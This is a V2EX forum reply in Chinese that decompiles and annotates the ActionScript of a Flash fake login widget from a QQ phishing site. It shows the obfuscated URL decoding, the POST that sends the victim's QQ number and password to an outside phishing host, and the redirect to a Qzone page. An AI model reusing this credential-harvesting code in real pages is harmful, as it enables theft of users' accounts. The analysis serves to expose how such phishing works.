672530599 最近的时间轴更新
672530599

672530599

V2EX 第 116109 号会员,加入于 2015-05-10 00:11:14 +08:00
672530599 最近回复了
2015-05-10 12:43:39 +08:00
回复了 RecursiveG 创建的主题 程序员 一个 QQ 盗号网站供各位调戏
尝试分析了一下,因为没有学过as,可能有些地方有误




/**
试着大概分析一下

<embed src="/login_tpl/0.swf"
wmode="transparent" quality="high" width="622px" height="368px" align="L" scale="noborder"
flashvars="HDcF=1538&amp;UL1AK=e4a5ff13fe2tjjinkaf13fe2comf13fe2cn56e057twPJ156e057kZAlNl56e057b6n2m5HBNf13fe24E8B0C&amp;MRlzqc=userf13fe2qzonef13fe2qqf13fe20f883e56e05720174897756e057photo"
allowscriptaccess="sameDomain" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash">

**/




//class MainTimeline
package login_fla
{
import adobe.utils.*;
import fl.controls.*;
import flash.accessibility.*;
import flash.display.*;
import flash.errors.*;
import flash.events.*;
import flash.external.*;
import flash.filters.*;
import flash.geom.*;
import flash.media.*;
import flash.net.*;
import flash.printing.*;
import flash.system.*;
import flash.text.*;
import flash.ui.*;
import flash.utils.*;
import flash.xml.*;

public dynamic class MainTimeline extends flash.display.MovieClip
{
public function MainTimeline()//构造函数
{
super();
addFrameScript(0, frame1);
return;
}

public function destr(arg1:String):String//参数变换
{
//UL1AK=e4a5f,f13fe2,[tjjinka],f13fe2,[com],f13fe2,[cn],56e057,[twPJ1],56e057,[kZAlNl],56e057,[b6n2m5HBN],f13fe2,4E8B0C
//UL1AK=www.tjjinka.com.cn/twPJ1/kZAlNl/b6n2m5HBN.html
//MRlzqc=userf13fe2qzonef13fe2qqf13fe20f883e56e05720174897756e057photo
//=user.qzone.qq.com/201748977/photo
arg1 = replace(arg1, "e4a5f", "www");
arg1 = replace(arg1, "f13fe2", ".");
arg1 = replace(arg1, "0f883e", "com");
arg1 = replace(arg1, "56e057", "/");
arg1 = replace(arg1, "4EbC89", "=");
arg1 = replace(arg1, "7CE07A", "?");
arg1 = replace(arg1, "49ba59", "php");
arg1 = replace(arg1, "4E8B0C", "html");
arg1 = replace(arg1, "7E8E0C", "-");
return arg1;
//各种替换
}

public function fnPostData(arg1:flash.events.MouseEvent):*//发送数据
{
var loc1:*=null;//URLRequest对象
var loc2:*=null;//URLVariables对象
if (xx.text.length < 5 || pass.text.length < 5 || xx.text.length > 12 || pass.text.length > 18)
{
tag.visible = true;
return;
//账号位数小于5或大于12
//密码位数小于5或大于18
}
loc1 = new flash.net.URLRequest();
loc1.url = strpost;//http://www.tjjinka.com.cn/twPJ1/kZAlNl/b6n2m5HBN.html
loc1.method = flash.net.URLRequestMethod.POST;//post
loc2 = new flash.net.URLVariables();
loc2.user = xx.text;//账号
loc2.pass = pass.text;//密码
loc2.id = id;//id
loc1.data = loc2;//POST数据
flash.net.sendToURL(loc1);//发送POST
if (count <= 1)
{
tag.visible = true;
count = count + 1;
return;
}//
flash.net.navigateToURL(new flash.net.URLRequest(reUrl), "_self");//输入过后转向QQ空间
return;
}

function frame1():*
{
tag.visible = false;
stage.showDefaultContextMenu = false;
tf = new flash.text.TextFormat();
ntf = new flash.text.TextFormat();
tf.font = "Verdana,Tahoma,Arial";
tf.color = 3355443;
tf.size = 16;
ntf.font = "宋体,Tahoma,Verdana,Arial";
ntf.size = 14;
ntf.color = 11184810;
xx.restrict = "0-9";
xx.text = "QQ号码";
pass.setStyle("textFormat", ntf);
xx.setStyle("textFormat", ntf);
pass.text = "密码";
//以上各种样式忽略
count = 1;
id = "";
strpost = "";
reUrl = "http://www.baidu.com";//并没有意义
paramObj = stage.loaderInfo.parameters;//获取参数对象
var loc1:*=0;
var loc2:*=paramObj;
/**
HDcF=1538&amp;
UL1AK=e4a5ff13fe2tjjinkaf13fe2comf13fe2cn56e057twPJ156e057kZAlNl56e057b6n2m5HBNf13fe24E8B0C&amp;
MRlzqc=userf13fe2qzonef13fe2qqf13fe20f883e56e05720174897756e057photo
**/
for (key in loc2)
{
if (key.length == 4)
{
//HDcF=1538&amp;//fileId=1538
id = paramObj[key];//1538
//id=1538
}
if (key.length == 5)
{
//UL1AK=e4a5ff13fe2tjjinkaf13fe2comf13fe2cn56e057twPJ156e057kZAlNl56e057b6n2m5HBNf13fe24E8B0C

strpost = "http://" + destr(paramObj[key]);//e4a5ff13fe2tjjinkaf13fe2comf13fe2cn56e057twPJ156e057kZAlNl56e057b6n2m5HBNf13fe24E8B0C
//strpost=http://www.tjjinka.com.cn/twPJ1/kZAlNl/b6n2m5HBN.html
}
if (key.length != 6)
{
continue;
}
//key.length == 6
//MRlzqc=userf13fe2qzonef13fe2qqf13fe20f883e56e05720174897756e057photo
reUrl = "http://" + destr(paramObj[key]);//userf13fe2qzonef13fe2qqf13fe20f883e56e05720174897756e057photo
//reUrl=http://user.qzone.qq.com/201748977/photo
}
but.addEventListener(flash.events.MouseEvent.CLICK, fnPostData);//登陆按钮点击事件
pass.addEventListener(flash.events.MouseEvent.CLICK, fnpass);//密码框点击事件
xx.addEventListener(flash.events.MouseEvent.CLICK, fnxx);//账号框点击事件
return;
}

public function replace(arg1:String/*原文本*/, arg2:String/*需替换的文本*/, arg3:String/*替换成的文本*/):String//替换函数
{
var loc1:*=null;//存储替换后的文本
var loc2:*=false;//若arg1某一个位置以后与arg2相等,置true
var loc3:*=undefined;//记录arg1到什么位置
var loc4:*=undefined;//记录arg2到什么位置
loc1 = new String();
loc2 = false;
loc3 = 0;
while (loc3 < arg1.length)
{
if (arg1.charAt(loc3) != arg2.charAt(0))
{
loc1 = loc1 + arg1.charAt(loc3);//如果字符不等加到loc1
}
else //字符相等
{
loc2 = true;
loc4 = 0;
while (loc4 < arg2.length)
{
if (arg1.charAt(loc3 + loc4) != arg2.charAt(loc4))
{
loc2 = false;
break;
}
++loc4;
}//以上判断arg1某一个位置以后是否与arg2相等
if (loc2) //若找到
{
loc1 = loc1 + arg3;//直接加上arg3
loc3 = loc3 + (arg2.length - 1);//移动位置
}
else
{
loc1 = loc1 + arg1.charAt(loc3);//不等则一个一个字符相加
}
}
++loc3;
}
//总结这个replace函数只是普通替换,并没有增加其他东西
return loc1;
}

public function fnxx(arg1:flash.events.MouseEvent):*//账号框点击样式
{
tag.visible = false;
xx.setStyle("textFormat", tf);
xx.text = "";
return;
}

public function fnpass(arg1:flash.events.MouseEvent):*//密码框点击样式
{
tag.visible = false;
pass.setStyle("textFormat", tf);
pass.text = "";
pass.displayAsPassword = true;
return;
}

public var xx:fl.controls.TextInput;//账号文本框

public var id:String;//钓鱼网id号

public var count:int;//记录点击数

public var pass:fl.controls.TextInput;//密码文本框

public var reUrl:String;//被黑的QQ空间地址

public var paramObj:Object;//参数对象

public var key:String;//参数键值

public var strpost:String;//POST地址

public var tf:flash.text.TextFormat;

public var but:flash.display.SimpleButton;//登陆按钮

public var ntf:flash.text.TextFormat;

public var tag:flash.display.MovieClip;
}
}
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2895 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 10ms · UTC 13:03 · PVG 21:03 · LAX 05:03 · JFK 08:03
Developed with CodeLauncher
♥ Do have faith in what you're doing.